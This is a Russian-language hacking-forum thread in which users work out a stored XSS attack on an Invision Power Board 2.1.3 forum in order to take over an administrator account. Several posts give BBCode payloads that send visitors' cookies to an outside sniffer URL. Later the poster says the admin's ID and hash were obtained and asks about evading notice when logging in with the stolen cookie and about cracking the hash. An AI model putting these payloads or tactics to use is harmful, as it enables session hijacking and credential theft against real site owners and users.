Есть форум Invision Power Board v2.1.3
Проблема - достать права Админа.. =(

Главная проблема в том, что ВСЕ! коды видно в Опере...

Я долго думал, пробовал разные комбинацыи и нашел код, который нигде (ни в Опере, ни в ИЕ) не видно, НО, он не работает как снифер...

Вот сам коД:

[COLO*R=[IM*G]http://aaa.aa/=`aaa.jpg[/I*MG]` style=background:url(javascript:document.images[1] .src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)] [/COL*OR]

Кто скажет, в чем проблема ? Почему код не работает?...

Заранее спасибо.

Есть форум Invision Power Board v2.1.3
Проблема - достать права Админа.. =(

Главная проблема в том, что ВСЕ! коды видно в Опере...

Я долго думал, пробовал разные комбинацыи и нашел код, который нигде (ни в Опере, ни в ИЕ) не видно, НО, он не работает как снифер...

Вот сам коД:

[COLO*R=[IM*G]http://aaa.aa/=`aaa.jpg[/I*MG]` style=background:url(javascript:document.images[1] .src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)] [/COL*OR]

Кто скажет, в чем проблема ? Почему код не работает?...

Заранее спасибо.
А ещё варианты есть какие нить??? Попробуй сплойтом.
И ещё, дай ссылку на сайт, я посмотрю.

Просто сплойт почему-то не работает =( Пробовал на 8 форумах ИПБ, нигде не находил хэши...
Может проблема в сплойте... я это $allchar .= chr($char); исправил, но он все-равно не работает... провил и на $allchar .= chr($i);

А в КОДе выше в чем может быть проблема ?


Вот сайт :

http://www.ссылки в личку!.com/forum/index.php?

Кстати, может быть проблема в этом ??
Что я после src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie) ---> ; не поставил ?
Типа так : src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);

???

Найдена XSS
alert
[e*mail]wj@wj[u*rl=http://www.wj.com`=`][/u*rl].com[/e*mail] ` style=`background:url(javaSCrip t:alert(/wj/))`

cookie
[em*ail]wj@wj[u*rl=http://www.wj.com`=`][/ur*l].com[/em*ail] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`

Звёздочки поубирай в тэгах.

Я только что проверял, всё работает... Барсик, ты чего.... Вот только что проверял!

Неее... Сплойтом не пробывал, так быстренько, на скорую руку посмотрел, XSS есть, читай статью WJ...
Она поможет...
Незабываем про репутацию! ;)

Блин, в Опере всеравно коды отображаются =(

А реально что-то сделать в том коде, что-бы и в Опере его небыло видно ?

У меня не работает :(
Что не так сделал?
www.barsik.jino-net.ru/forum.jpg
В опере нельзя сделать, но можно код спрятать
Под цвет фона

Ошибочка у тебя на скрине по мойму
Попробуй так:
wj@wj.com`style=`background:url(javaSCript:documen t.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`

Нет даже так не работает. Ну ладно ничего страшного :)

tam forum 99% propat4en
proveryal davno eshe na localhoste pashet vrode :P

Всем спасибо, уже сам разобрался =) Чуть переделал один КОД...

Вот возник еще вопрос по ИПБ...
Я достал ИД и Хэш админа...

1. Если я войду на форум (через смену кукисов) под аккаунтом того админа, который уже есть онлайн... что будет ? (ему что-то напишет, что под его ником зашли с другого ИП, или все будет норм и он не заметит?)

2. Нащет Хэша: Можно ли его как-то расшифровать ? Форум: Invision Power Board v2.1.3. Как я понял, там не МД5 ?

2) нет расшифровать не сможешь, почему не скажу

Как узнать пароль Админа, если есть его логин, ИД и Хэш ?

Пароль может быть в хэше Md5. Пароль может быть в хэше md5 и ещё раз в хэше md5. Пароль может быть в md5+md5соль и всё это вместе в md5. И так далее.

Как узнать? Узнать как пароль зашифрован и зделать выводы. К просмотру рекомендую видео от Coyl про расшифровку паролей в IPB 2.*.*

PS. Чесно говоря ожидал этого вопроса.

Всем спасибо, уже сам разобрался =) Чуть переделал один КОД...

и что у тебя за код получился, который в опере работает?